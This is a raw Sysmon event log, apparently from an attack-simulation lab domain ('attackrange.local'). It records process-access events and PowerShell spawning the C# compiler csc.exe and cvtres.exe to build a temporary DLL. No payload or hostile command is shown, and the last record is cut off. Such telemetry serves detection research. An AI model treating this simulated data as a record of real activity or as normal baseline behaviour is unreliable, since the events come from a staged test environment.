13:08:48.246{08A6967A-4260-6000-DF02-000000009901}4504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\edneznio.dll2021-01-14 13:08:48.137 10341000x8000000000000000412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.230{08A6967A-425F-6000-DA02-000000009901}14602896C:\Windows\system32\conhost.exe{08A6967A-4260-6000-E002-000000009901}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.230{08A6967A-40D2-6000-0500-000000009901}6443180C:\Windows\system32\csrss.exe{08A6967A-4260-6000-E002-000000009901}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.230{08A6967A-4260-6000-DF02-000000009901}45044496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{08A6967A-4260-6000-E002-000000009901}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.238{08A6967A-4260-6000-E002-000000009901}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES26E3.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCA3DD145D6B7142519E7C3BCB516940EC.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-425F-6000-BA54-110000000000}0x1154ba0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{08A6967A-4260-6000-DF02-000000009901}4504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\edneznio.cmdline" 10341000x8000000000000000399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.137{08A6967A-425F-6000-DA02-000000009901}14602896C:\Windows\system32\conhost.exe{08A6967A-4260-6000-DF02-000000009901}4504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.137{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.137{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.137{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.137{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.137{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.137{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.137{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.137{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.137{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.137{08A6967A-40D2-6000-0500-000000009901}644768C:\Windows\system32\csrss.exe{08A6967A-4260-6000-DF02-000000009901}4504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.137{08A6967A-425F-6000-DD02-000000009901}27604720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4260-6000-DF02-000000009901}4504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF9C790B68F) 154100x8000000000000000387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.146{08A6967A-4260-6000-DF02-000000009901}4504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths 